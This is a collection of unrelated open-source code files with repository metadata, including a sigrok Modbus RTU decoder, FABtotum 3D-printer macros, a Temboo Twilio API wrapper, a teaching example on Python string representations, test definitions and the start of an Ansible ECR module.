7: 'Read Exception Status',
8: 'Diagnostic',
11: 'Get Com Event Counter',
12: 'Get Com Event Log',
15: 'Write Multiple Coils',
16: 'Write Multiple Registers',
17: 'Report Slave ID',
20: 'Read File Record',
21: 'Write File Record',
22: 'Mask Write Register',
23: 'Read/Write Multiple Registers',
24: 'Read FIFO Queue',
43: 'Read Device Identification/Encapsulated Interface Transport',
}
functionname = '{}: {}'.format(functioncode,
functions.get(functioncode, 'Unknown function'))
self.puti(1, 'function',
'Error for function {}'.format(functionname))
error = self.data[2].data
errorcodes = {
1: 'Illegal Function',
2: 'Illegal Data Address',
3: 'Illegal Data Value',
4: 'Slave Device Failure',
5: 'Acknowledge',
6: 'Slave Device Busy',
8: 'Memory Parity Error',
10: 'Gateway Path Unavailable',
11: 'Gateway Target Device failed to respond',
}
errorname = '{}: {}'.format(error, errorcodes.get(error, 'Unknown'))
self.puti(2, 'data', 'Error {}'.format(errorname))
self.check_crc(4)
class Modbus_ADU_CS(Modbus_ADU):
'''CS stands for Client -> Server.'''
def parse(self):
'''Select which specific Modbus function we should parse.'''
data = self.data
# This try-catch is being used as flow control.
try:
server_id = data[0].data
message = ''
if server_id == 0:
message = 'Broadcast message'
elif 1 <= server_id <= 247:
message = 'Slave ID: {}'.format(server_id)
elif 248 <= server_id <= 255:
message = 'Slave ID: {} (reserved address)'.format(server_id)
self.puti(0, 'server-id', message)
function = data[1].data
if function >= 1 and function <= 4:
self.parse_read_data_command()
if function == 5:
self.parse_write_single_coil()
if function == 6:
self.parse_write_single_register()
if function in {7, 11, 12, 17}:
self.parse_single_byte_request()
elif function == 8:
self.parse_diagnostics()
if function in {15, 16}:
self.parse_write_multiple()
elif function == 22:
self.parse_mask_write_register()
elif function == 23:
self.parse_read_write_registers()
elif function in {20, 21, 24, 43}:
self.parse_not_implemented()
else:
self.puti(1, 'error',
'Unknown function: {}'.format(data[1].data))
self.putl('error', 'Unknown function')
# If the message gets here without raising an exception, the
# message goes on longer than it should.
self.putl('error', 'Message too long')
except No_more_data:
# Just a message saying we don't need to parse anymore this round.
pass
def parse_read_data_command(self):
'''Interpret a command to read x units of data starting at address, ie
functions 1, 2, 3 and 4, and write the result to the annotations.'''
data = self.data
self.minimum_length = 8
function = data[1].data
functionname = {1: 'Read Coils',
2: 'Read Discrete Inputs',
3: 'Read Holding Registers',
4: 'Read Input Registers',
}[function]
self.puti(1, 'function',
'Function {}: {}'.format(function, functionname))
starting_address = self.half_word(2)
# Some instruction manuals use a long form name for addresses, this is
# listed here for convenience.
# Example: holding register 60 becomes 30061.
address_name = 10000 * function + 1 + starting_address
self.puti(3, 'address',
'Start at address 0x{:X} / {:d}'.format(starting_address,
address_name))
self.puti(5, 'length',
'Read {:d} units of data'.format(self.half_word(4)))
self.check_crc(7)
def parse_single_byte_request(self):
'''Some Modbus functions have no arguments, this parses those.'''
function = self.data[1].data
function_name = {7: 'Read Exception Status',
11: 'Get Comm Event Counter',
12: 'Get Comm Event Log',
17: 'Report Slave ID',
}[function]
self.puti(1, 'function',
'Function {}: {}'.format(function, function_name))
self.check_crc(3)
def parse_write_multiple(self):
'''Function 15 and 16 are almost the same, so we can parse them both
using one function.'''
self.minimum_length = 9
function = self.data[1].data
if function == 15:
data_unit = 'Coils'
max_outputs = 0x07B0
ratio_bytes_data = 1/8
long_address_offset = 10001
elif function == 16:
data_unit = 'Registers'
max_outputs = 0x007B
ratio_bytes_data = 2
long_address_offset = 30001
self.puti(1, 'function',
'Function {}: Write Multiple {}'.format(function, data_unit))
starting_address = self.half_word(2)
# Some instruction manuals use a long form name for addresses, this is
# listed here for convenience.
address_name = long_address_offset + starting_address
self.puti(3, 'address',
'Start at address 0x{:X} / {:d}'.format(starting_address,
address_name))
quantity_of_outputs = self.half_word(4)
if quantity_of_outputs <= max_outputs:
self.puti(5, 'length',
'Write {} {}'.format(quantity_of_outputs, data_unit))
else:
self.puti(5, 'error',
'Bad value: {} {}. Max is {}'.format(quantity_of_outputs,
data_unit, max_outputs))
proper_bytecount = ceil(quantity_of_outputs * ratio_bytes_data)
bytecount = self.data[6].data
if bytecount == proper_bytecount:
self.puti(6, 'length', 'Byte count: {}'.format(bytecount))
else:
self.puti(6, 'error',
'Bad byte count, is {}, should be {}'.format(bytecount,
proper_bytecount))
self.minimum_length = bytecount + 9
self.putl('data', 'Value 0x{:X}', 6 + bytecount)
self.check_crc(bytecount + 8)
def parse_read_file_record(self):
self.puti(1, 'function', 'Function 20: Read file records')
data = self.data
bytecount = data[2].data
self.minimum_length = 5 + bytecount
# 1 for serverID, 1 for function, 1 for bytecount, 2 for CRC.
if 0x07 <= bytecount <= 0xF5:
self.puti(2, 'length', 'Request is {} bytes long'.format(bytecount))
else:
self.puti(2, 'error',
'Request claims to be {} bytes long, legal values are between'
' 7 and 247'.format(bytecount))
current_byte = len(data) - 1
# Function 20 is a number of sub-requests, the first starting at 3,
# the total length of the sub-requests is bytecount.
if current_byte <= bytecount + 2:
step = (current_byte - 3) % 7
if step == 0:
if data[current_byte].data == 6:
self.puti(current_byte, 'data', 'Start sub-request')
else:
self.puti(current_byte, 'error',
'First byte of subrequest should be 0x06')
elif step == 1:
raise No_more_data
elif step == 2:
file_number = self.half_word(current_byte - 1)
self.puti(current_byte, 'data',
'Read File number {}'.format(file_number))
elif step == 3:
raise No_more_data
elif step == 4:
record_number = self.half_word(current_byte - 1)
self.puti(current_byte, 'address',
'Read from record number {}'.format(record_number))
# TODO: Check if within range.
elif step == 5:
raise No_more_data
elif step == 6:
records_to_read = self.half_word(current_byte - 1)
self.puti(current_byte, 'length',
'Read {} records'.format(records_to_read))
self.check_crc(4 + bytecount)
def parse_read_write_registers(self):
'''Parse function 23: Read/Write multiple registers.'''
self.minimum_length = 13
self.puti(1, 'function', 'Function 23: Read/Write Multiple Registers')
starting_address = self.half_word(2)
# Some instruction manuals use a long form name for addresses, this is
# listed here for convenience.
# Example: holding register 60 becomes 30061.
address_name = 30001 + starting_address
self.puti(3, 'address',
'Read starting at address 0x{:X} / {:d}'.format(starting_address,
address_name))
self.puti(5, 'length', 'Read {:d} units of data'.format(self.half_word(4)))
starting_address = self.half_word(6)
address_name = 30001 + starting_address
self.puti(7, 'address',
'Write starting at address 0x{:X} / {:d}'.format(starting_address,
address_name))
quantity_of_outputs = self.half_word(8)
self.puti(9, 'length',
'Write {} registers'.format(quantity_of_outputs))
proper_bytecount = quantity_of_outputs * 2
bytecount = self.data[10].data
if bytecount == proper_bytecount:
self.puti(10, 'length', 'Byte count: {}'.format(bytecount))
else:
self.puti(10, 'error',
'Bad byte count, is {}, should be {}'.format(bytecount,
proper_bytecount))
self.minimum_length = bytecount + 13
self.putl('data', 'Data, value 0x{:02X}', 10 + bytecount)
self.check_crc(bytecount + 12)
class Decoder(srd.Decoder):
api_version = 3
id = 'modbus'
name = 'Modbus'
longname = 'Modbus RTU over RS232/RS485'
desc = 'Modbus RTU protocol for industrial applications.'
license = 'gplv3+'
inputs = ['uart']
outputs = ['modbus']
tags = ['Embedded/industrial']
annotations = (
('sc-server-id', ''),
('sc-function', ''),
('sc-crc', ''),
('sc-address', ''),
('sc-data', ''),
('sc-length', ''),
('sc-error', ''),
('cs-server-id', ''),
('cs-function', ''),
('cs-crc', ''),
('cs-address', ''),
('cs-data', ''),
('cs-length', ''),
('cs-error', ''),
('error-indication', ''),
)
annotation_rows = (
('sc', 'Server->client', (0, 1, 2, 3, 4, 5, 6)),
('cs', 'Client->server', (7, 8, 9, 10, 11, 12, 13)),
('error-indicator', 'Errors in frame', (14,)),
)
options = (
{'id': 'scchannel', 'desc': 'Server -> client channel',
'default': rxtx_channels[0], 'values': rxtx_channels},
{'id': 'cschannel', 'desc': 'Client -> server channel',
'default': rxtx_channels[1], 'values': rxtx_channels},
{'id': 'framegap', 'desc': 'Inter-frame bit gap', 'default': 28},
)
def __init__(self):
self.reset()
def reset(self):
self.ADUSc = None # Start off with empty server -> client ADU.
self.ADUCs = None # Start off with empty client -> server ADU.
# The reason we have both (despite not supporting full duplex comms) is
# because we want to be able to decode the message as both client ->
# server and server -> client, and let the user see which of the two
# the ADU was.
self.bitlength = None # We will later test how long a bit is.
def start(self):
self.out_ann = self.register(srd.OUTPUT_ANN)
def puta(self, start, end, ann_str, message):
'''Put an annotation from start to end, with ann as a
string. This means you don't have to know the ann's
number to write annotations to it.'''
ann = [s[0] for s in self.annotations].index(ann_str)
self.put(start, end, self.out_ann, [ann, [message]])
def decode_adu(self, ss, es, data, direction):
'''Decode the next byte or bit (depending on type) in the ADU.
ss: Start time of the data
es: End time of the data
data: Data as passed from the UART decoder
direction: Is this data for the Cs (client -> server) or Sc (server ->
client) being decoded right now?'''
ptype, rxtx, pdata = data
# We don't have a nice way to get the baud rate from UART, so we have
# to figure out how long a bit lasts. We do this by looking at the
# length of (probably) the startbit.
if self.bitlength is None:
if ptype == 'STARTBIT' or ptype == 'STOPBIT':
self.bitlength = es - ss
else:
# If we don't know the bitlength yet, we can't start decoding.
return
# Select the ADU, create the ADU if needed.
# We set ADU.startNewFrame = True when we know the old one is over.
if direction == 'Sc':
if (self.ADUSc is None) or self.ADUSc.startNewFrame:
self.ADUSc = Modbus_ADU_SC(self, ss, TX, 'sc-')
ADU = self.ADUSc
if direction == 'Cs':
if self.ADUCs is None or self.ADUCs.startNewFrame:
self.ADUCs = Modbus_ADU_CS(self, ss, TX, 'cs-')
ADU = self.ADUCs
# We need to determine if the last ADU is over.
# According to the Modbus spec, there should be 3.5 characters worth of
# space between each message. But if within a message there is a length
# of more than 1.5 character, that's an error. For our purposes
# somewhere between seems fine.
# A character is 11 bits long, so (3.5 + 1.5)/2 * 11 ~= 28
# TODO: Display error for too short or too long.
if (ss - ADU.last_read) <= self.bitlength * self.options['framegap']:
ADU.add_data(ss, es, data)
else:
# It's been too long since the last part of the ADU!
# If there is any data in the ADU we need to show it to the user
if len(ADU.data) > 0:
# Extend errors for 3 bits after last byte, we can guarantee
# space.
ADU.close(ADU.data[-1].end + self.bitlength * 3)
ADU.startNewFrame = True
# Restart this function, it will make a new ADU for us.
self.decode_adu(ss, es, data, direction)
def decode(self, ss, es, data):
ptype, rxtx, pdata = data
# Decide what ADU(s) we need this packet to go to.
# Note that it's possible to go to both ADUs.
if rxtx_channels[rxtx] == self.options['scchannel']:
self.decode_adu(ss, es, data, 'Sc')
if rxtx_channels[rxtx] == self.options['cschannel']:
self.decode_adu(ss, es, data, 'Cs')
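# A standalone sanity check for the CRC logic in calc_crc() above
# (illustrative, not part of the decoder): the classic Modbus RTU query
# 01 03 00 00 00 01 carries the CRC bytes 84 0A, low byte first.
def _crc16_sketch(frame):
    result = 0xFFFF
    for byte in frame:
        result ^= byte
        for _ in range(8):
            lsb = result & 1
            result >>= 1
            if lsb:
                result ^= 0xA001  # Same magic number as the decoder uses.
    return (result & 0xFF, (result & 0xFF00) >> 8)

assert _crc16_sketch([0x01, 0x03, 0x00, 0x00, 0x00, 0x01]) == (0x84, 0x0A)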
| Entropy512/libsigrokdecode | decoders/modbus/pd.py | Python | gpl-3.0 | 37,104 |
#!/usr/bin/env python
from deter import topdl
subs = [ ]
elems = [ ]
for i in range(0,2):
print i
subs.append(topdl.Substrate(name='link'+str(i)))
print subs
clients = ('client1','client2')
for index,elem_name in enumerate(clients):
inf = topdl.Interface(name='inf000', substrate=['link'+str(index)])
elem = topdl.Computer(name=elem_name, interface=[inf])
elem.set_attribute('containers:node_type','openvz');
elem.set_attribute('containers:partition',index);
elem.set_attribute('startup','sudo python /share/magi/current/magi_bootstrap.py');
elems.append(elem)
servers = ('server1',)
for index in xrange(len(clients)):
inf = topdl.Interface(name='inf'+str(format(index,'03d')), substrate=['link'+str(index)])
elem = topdl.Computer(name='server1', interface = [inf])
elem.set_attribute('container:node_type','embedded_pnode');
elem.set_attribute('container:partition', len(clients)+1);
elem.set_attribute('startup','sudo python /share/magi/current/magi_bootstrap.py');
elems.append(elem)
"""elem = topdl.Computer(name='control')
elem.set_attribute('containers:node_type','embedded_pnode');
elem.set_attribute('containers:partition','1');
elem.set_attribute('startup','sudo python /share/magi/current/magi_bootstrap.py');
elems.append(elem)"""
top = topdl.Topology(substrates=subs, elements=elems)
f = open ('exp2.xml','w+')
f.write( topdl.topology_to_xml(top, top ='experiment'))
f.close()
#print topdl.topology_to_xml(top, top='experiment')
| deter-project/magi | atscale/Containerization/exp1.py | Python | gpl-2.0 | 1,474 |
from __future__ import absolute_import
from .webhooks import WebHooksTestCase, GitlabWebHooksTestCase
from .gitlab import GitlabTestCase
from .util import UtilTestCase
from .redis import RedisModelTestCase
| pipex/gitbot | tests/__init__.py | Python | apache-2.0 | 207 |
import zstackwoodpecker.test_state as ts_header
import os
TestAction = ts_header.TestAction
def path():
return dict(initial_formation="template5", checking_point=8, path_list=[
[TestAction.create_vm, 'vm1', 'flag=ceph'],
[TestAction.create_volume, 'volume1', 'flag=ceph,scsi'],
[TestAction.attach_volume, 'vm1', 'volume1'],
[TestAction.create_volume, 'volume2', 'flag=ceph,scsi'],
[TestAction.attach_volume, 'vm1', 'volume2'],
[TestAction.create_volume, 'volume3', 'flag=ceph,scsi'],
[TestAction.attach_volume, 'vm1', 'volume3'],
[TestAction.create_vm_snapshot, 'vm1', 'vm1-snapshot1'],
[TestAction.create_image_from_volume, 'vm1', 'vm1-image1'],
[TestAction.detach_volume, 'volume3'],
[TestAction.create_vm_snapshot, 'vm1', 'vm1-snapshot5'],
[TestAction.clone_vm, 'vm1', 'vm2'],
[TestAction.create_vm_snapshot, 'vm2', 'vm2-snapshot8'],
[TestAction.create_image_from_volume, 'vm1', 'vm1-image2'],
[TestAction.delete_volume, 'volume2'],
[TestAction.batch_delete_volume_snapshot, ['volume1-snapshot5','volume2-snapshot5',]],
[TestAction.delete_vm_snapshot, 'vm2-snapshot8'],
])
'''
The final status:
Running:['vm1', 'vm2']
Stopped:[]
Enabled:['vm1-snapshot1', 'volume1-snapshot1', 'volume2-snapshot1', 'volume3-snapshot1', 'vm1-snapshot5', 'vm1-image1', 'vm1-image2']
attached:['volume1']
Detached:['volume3']
Deleted:['volume2', 'volume1-snapshot5', 'volume2-snapshot5', 'vm2-snapshot8']
Expunged:[]
Ha:[]
Group:
vm_snap1:['vm1-snapshot1', 'volume1-snapshot1', 'volume2-snapshot1', 'volume3-snapshot1']---vm1@volume1_volume2_volume3
'''
| zstackio/zstack-woodpecker | integrationtest/vm/multihosts/vm_snapshots/paths/xc_path47.py | Python | apache-2.0 | 1,580 |
def str_repr_demos():
from fractions import Fraction
half = Fraction(1, 2)
half
print(half)
str(half)
repr(half)
s = 'hello world'
str(s)
repr(s)
"'hello world'"
repr(repr(repr(s)))
eval(eval(eval(repr(repr(repr(s))))))
# Errors: eval('hello world')
# Implementing generic string functions
class Bear:
"""A Bear."""
def __init__(self):
self.__repr__ = lambda: 'oski'
self.__str__ = lambda: 'oski the bear'
def __repr__(self):
return 'Bear()'
def __str__(self):
return 'a bear'
def print_bear():
oski = Bear()
print(oski)
print(str(oski))
print(repr(oski))
print(oski.__repr__())
print(oski.__str__())
def repr(x):
return type(x).__repr__(x)
def str(x):
t = type(x)
if hasattr(t, '__str__'):
return t.__str__(x)
else:
return repr(x)
print_bear()
# Ratio numbers
class Ratio:
"""A mutable ratio.
>>> f = Ratio(9, 15)
>>> f
Ratio(9, 15)
>>> print(f)
9/15
>>> f.gcd
3
>>> f.numer = 6
>>> f.denom
10
>>> f.gcd
2
>>> f
Ratio(6, 10)
>>> f.denom = 5
>>> f
Ratio(3, 5)
>>> Ratio(1, 3) + Ratio(1, 6)
Ratio(1, 2)
>>> f + 1
Ratio(8, 5)
>>> 1 + f
Ratio(8, 5)
>>> 1.4 + f
2.0
"""
def __init__(self, n, d):
self.gcd = gcd(n, d)
self._numer = n // self.gcd
self._denom = d // self.gcd
def __repr__(self):
return 'Ratio({0}, {1})'.format(self.numer, self.denom)
def __str__(self):
return '{0}/{1}'.format(self.numer, self.denom)
def __add__(self, other):
if isinstance(other, Ratio):
n = self.numer * other.denom + self.denom * other.numer
d = self.denom * other.denom
elif isinstance(other, int):
n = self.numer + self.denom * other
d = self.denom
else:
return float(self) + other
r = Ratio(n, d)
r.gcd = 1
return r
__radd__ = __add__
def __float__(self):
return self.numer / self.denom
@property
def numer(self):
return self._numer * self.gcd
@property
def denom(self):
return self._denom * self.gcd
@numer.setter
def numer(self, value):
assert value % self._numer == 0
self.gcd = value // self._numer
@denom.setter
def denom(self, value):
assert value % self._denom == 0
self.gcd = value // self._denom
def gcd(x, y):
"""Return the greatest common divisor of integers x & y.
>>> gcd(12, 8)
4
"""
while x != y:
x, y = abs(x-y), min(x, y)
return x
| tavaresdong/courses-notes | ucb_cs61A/lectures/16.py | Python | mit | 2,731 |
# -*- coding: utf-8 -*-
###############################################################################
#
# ListPhoneNumbers
# Returns a list of Twilio phone numbers purchased from Twilio or ported to Twilio.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ListPhoneNumbers(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the ListPhoneNumbers Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(ListPhoneNumbers, self).__init__(temboo_session, '/Library/Twilio/IncomingPhoneNumbers/ListPhoneNumbers')
def new_input_set(self):
return ListPhoneNumbersInputSet()
def _make_result_set(self, result, path):
return ListPhoneNumbersResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ListPhoneNumbersChoreographyExecution(session, exec_id, path)
class ListPhoneNumbersInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ListPhoneNumbers
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccountSID(self, value):
"""
Set the value of the AccountSID input for this Choreo. ((required, string) The AccountSID provided when you signed up for a Twilio account.)
"""
super(ListPhoneNumbersInputSet, self)._set_input('AccountSID', value)
def set_AuthToken(self, value):
"""
Set the value of the AuthToken input for this Choreo. ((required, string) The authorization token provided when you signed up for a Twilio account.)
"""
super(ListPhoneNumbersInputSet, self)._set_input('AuthToken', value)
def set_FriendlyName(self, value):
"""
Set the value of the FriendlyName input for this Choreo. ((optional, string) Only return the incoming phone number resources with friendly names that exactly match this name.)
"""
super(ListPhoneNumbersInputSet, self)._set_input('FriendlyName', value)
def set_PageSize(self, value):
"""
Set the value of the PageSize input for this Choreo. ((optional, integer) The number of results per page.)
"""
super(ListPhoneNumbersInputSet, self)._set_input('PageSize', value)
def set_Page(self, value):
"""
Set the value of the Page input for this Choreo. ((optional, integer) The page of results to retrieve. Defaults to 0.)
"""
super(ListPhoneNumbersInputSet, self)._set_input('Page', value)
def set_PhoneNumber(self, value):
"""
Set the value of the PhoneNumber input for this Choreo. ((optional, string) Only return the incoming phone number resources that match this pattern. You can specify partial numbers and use '*' as a wildcard for any digit.)
"""
super(ListPhoneNumbersInputSet, self)._set_input('PhoneNumber', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are: json (the default) and xml.)
"""
super(ListPhoneNumbersInputSet, self)._set_input('ResponseFormat', value)
def set_SubAccountSID(self, value):
"""
Set the value of the SubAccountSID input for this Choreo. ((optional, string) The SID of the subaccount associated with the list of phone numbers. If not specified, the main AccountSID used to authenticate is used in the request.)
"""
super(ListPhoneNumbersInputSet, self)._set_input('SubAccountSID', value)
class ListPhoneNumbersResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ListPhoneNumbers Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from Twilio.)
"""
return self._output.get('Response', None)
class ListPhoneNumbersChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ListPhoneNumbersResultSet(response, path)
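# A hedged usage sketch (not part of the generated file). Session setup
# follows the standard Temboo SDK pattern; the account name, app key name,
# and credential values below are placeholders.
#
#   from temboo.core.session import TembooSession
#
#   session = TembooSession('ACCOUNT_NAME', 'APP_KEY_NAME', 'APP_KEY_VALUE')
#   choreo = ListPhoneNumbers(session)
#   inputs = choreo.new_input_set()
#   inputs.set_AccountSID('ACxxxxxxxxxxxxxxxx')
#   inputs.set_AuthToken('your-auth-token')
#   results = choreo.execute_with_results(inputs)
#   print(results.get_Response())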
| jordanemedlock/psychtruths | temboo/core/Library/Twilio/IncomingPhoneNumbers/ListPhoneNumbers.py | Python | apache-2.0 | 5,238 |
#!/bin/env python
# -*- coding: utf-8; -*-
#
# (c) 2016 FABtotum, http://www.fabtotum.com
#
# This file is part of FABUI.
#
# FABUI is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# FABUI is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with FABUI. If not, see <http://www.gnu.org/licenses/>.
__authors__ = "Marco Rizzuto, Daniel Kesler, Krios Mane"
__license__ = "GPL - https://opensource.org/licenses/GPL-3.0"
__version__ = "1.0"
# Import standard python module
import re
# Import external modules
# Import internal modules
from fabtotum.fabui.macros.common import getEeprom, configure_head, configure_feeder, configure_4thaxis, get_versions, getPosition, set_lights, getTemperature
from fabtotum.utils.translation import _, setLanguage
from fabtotum.fabui.constants import *
def home_all(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
try:
zprobe_disabled = int(app.config.get('settings', 'probe.enable')) == 0
z_max_offset = app.config.get('settings', 'z_max_offset')
except KeyError:
z_max_offset = Z_MAX_OFFSET
zprobe_disabled = False
app.trace( _("Homing all axes") )
app.macro("G90", "ok", 2, _("Setting abs position"), verbose=False)
    if zprobe_disabled:
app.macro("G27", "ok", 200, _("Homing all axes"), verbose=False)
app.macro('G92 Z{0}'.format(z_max_offset), "ok", 99, _("Set Z Max"), verbose=False)
app.macro("G0 Z50 F10000", "ok", 120, _("Raising"), verbose=False)
app.macro("M400", "ok", 120, _("Waiting for all moves to finish"), verbose=False)
else:
app.macro("G28", "ok", 200, _("Homing all axes"), verbose=False)
def start_up(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
try:
color = app.config.get('settings', 'color')
except KeyError:
color = {
'r' : 255,
'g' : 255,
'b' : 255,
}
try:
safety_door = app.config.get('settings', 'safety')['door']
except KeyError:
safety_door = 0
try:
switch = app.config.get('settings', 'switch')
except KeyError:
switch = 0
try:
collision_warning = app.config.get('settings', 'safety')['collision-warning']
except KeyError:
collision_warning = 0
app.trace( _("Starting up") )
app.macro("M728", "ok", 2, _("Alive!"), verbose=False)
app.macro("M402", "ok", 1, _("Probe Up") )
app.macro("M701 S"+str(color['r']), "ok", 2, _("Turning on lights"), verbose=False)
app.macro("M702 S"+str(color['g']), "ok", 2, _("Turning on lights"), verbose=False)
app.macro("M703 S"+str(color['b']), "ok", 2, _("Turning on lights"), verbose=False)
app.macro("M732 S"+str(safety_door),"ok", 2, _("Safety Settings"), verbose=False)
app.macro("M714 S"+str(switch), "ok", 2, _("Homing direction"), verbose=False)
app.macro("M734 S"+str(collision_warning), "ok", 2, _("Machine Limits Collision warning"), verbose=False)
def shutdown(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
installed_head = app.config.get_current_head_info()
temps = getTemperature(app)
min_temperature = 70
app.trace( _("Shutting down...") )
if "print" in installed_head['capabilities'] and (float(temps['T']) > min_temperature ):
app.macro("M104 S{0}".format(min_temperature), "ok", 5, _("Cooling down nozzle temperature") )
app.macro("M109 S{0}".format(min_temperature), "*", 400, _("Waiting for nozzle to reach temperature (<span class='top-bar-nozzle-actual'>-</span> / {0}°)".format(min_temperature)) ) #heating and waiting.
app.trace( _("Nozzle cooled") )
app.macro("M300", "ok", 5, _("Play alert sound!"), verbose=False)
app.macro("M729", "ok", 2, _("Asleep!"), verbose=False)
def auto_bed_leveling(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
app.trace( _("Auto Bed leveling Initialized") )
app.macro("G28", "ok", 120, _("Homing Z axis") )
app.macro("G28 X Y", "ok", 90, _("Homing X/Y axis") )
app.macro("G29", "ok", 150, _("Probing the bed") )
def probe_down(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
app.macro("M401", "ok", 1, _("Probe Down") )
def probe_up(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
app.macro("M402", "ok", 1, _("Probe Up") )
def safe_zone(app, args = None, lang='en_US.UTF-8'):
""" .. todo: turn these into macroes """
setLanguage(lang)
pass
#~ app.send("G91")
#~ app.send("G0 E-5 F1000")
#~ app.send("G0 Z+1 F1000")
#~ app.send("G90")
#~ app.send("G27 Z0")
#~ app.send("G0 X210 Y210")
def engage_4axis(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
try:
safety_door = app.config.get('settings', 'safety')['door']
except KeyError:
safety_door = 0
app.trace( _("Checking safety measures") )
if safety_door == 1:
app.macro("M741", "TRIGGERED", 2, _("Front panel door opened"), verbose=False )
feeder = app.config.get_feeder_info('built_in_feeder')
units_a = feeder['steps_per_angle']
try:
feeder_disengage_offset = app.config.get('settings', 'feeder')['disengage_offset']
except KeyError:
feeder_disengage_offset = 2
app.trace( _("Engaging 4th Axis") )
app.macro("G27", "ok", 100, _("Zeroing Z axis") )
app.macro("G91", "ok", 1, _("Setting rel position"), verbose=False)
app.macro("M120", "ok", 1, _("Disable endstop checking") )
app.macro("G0 Z+"+str(feeder_disengage_offset)+" F300", "ok", 90, _("Engaging 4th Axis") )
#app.macro("M400", "ok", 5, _("Waiting for all moves to finish"), verbose=False)
app.macro("M121", "ok", 1, _("Enable endstop checking") )
app.macro("M92 E"+str(units_a), "ok", 1, _("Setting 4th axis mode") )
app.macro("G92 Z241", "ok", 1, _("Setting Z position"), verbose=False)
app.macro("G90", "ok", 1, _("Setting abs position"), verbose=False)
app.macro("G0 Z234", "ok", 1, _("Check position"), verbose=False)
app.macro("M300", "ok", 3, _("Play beep sound"), verbose=False)
def do_4th_axis_mode(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
    feeder = app.config.get_feeder_info('built_in_feeder')
units_a = feeder['steps_per_angle']
app.macro("M92 E"+str(units_a), "ok", 1, _("Setting 4th axis mode"), verbose=False)
def version(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
return get_versions(app, lang)
def set_ambient_color(app, args = None, lang='en_US.UTF-8'):
return set_lights(app, args, lang)
def install_head(app, args, lang='en_US.UTF-8'):
setLanguage(lang)
head_name = args[0]
result = configure_head(app, head_name, lang)
# app.trace(_("Restarting totumduino"))
return result
def install_feeder(app, args, lang='en_US.UTF-8'):
feeder_name = args[0]
result = configure_feeder(app, feeder_name, lang)
return result
def install_4thaxis(app, args, lang='en_US.UTF-8'):
fourthaxis_name = args[0]
result = configure_4thaxis(app, fourthaxis_name, lang)
return result
def clear_errors(app, args = None, lang='en_US.UTF-8'):
app.macro("M999", "ok", 5, _("Clearing error state"), verbose=False)
app.macro("M728", "ok", 5, _("Awaken"), verbose=False)
def read_eeprom(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
return getEeprom(app, lang)
def read_position(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
return getPosition(app, lang)
def door_safety(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
try:
safety_door = app.config.get('settings', 'safety')['door']
except KeyError:
safety_door = 0
app.trace( _("Checking safety measures") )
if safety_door == 1:
app.macro("M741", "TRIGGERED", 2, _("Front panel door opened"), verbose=False )
|
FABtotum/colibri-fabui
|
fabui/ext/py/fabtotum/fabui/macros/general.py
|
Python
|
gpl-2.0
| 8,809
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ecs_ecr
version_added: "2.3"
short_description: Manage Elastic Container Registry repositories
description:
- Manage Elastic Container Registry repositories
options:
name:
description:
- the name of the repository
required: true
registry_id:
description:
- AWS account id associated with the registry.
- If not specified, the default registry is assumed.
required: false
policy:
description:
- JSON or dict that represents the new policy
required: false
force_set_policy:
description:
- if no, prevents setting a policy that would prevent you from
setting another policy in the future.
required: false
default: false
delete_policy:
description:
- if yes, remove the policy from the repository
required: false
default: false
state:
description:
- create or destroy the repository
required: false
choices: [present, absent]
default: 'present'
author:
- David M. Lee (@leedm777)
extends_documentation_fragment: aws
'''
EXAMPLES = '''
# If the repository does not exist, it is created. If it does exist, this has
# no effect on any policies already on it.
- name: ecr-repo
ecs_ecr: name=super/cool
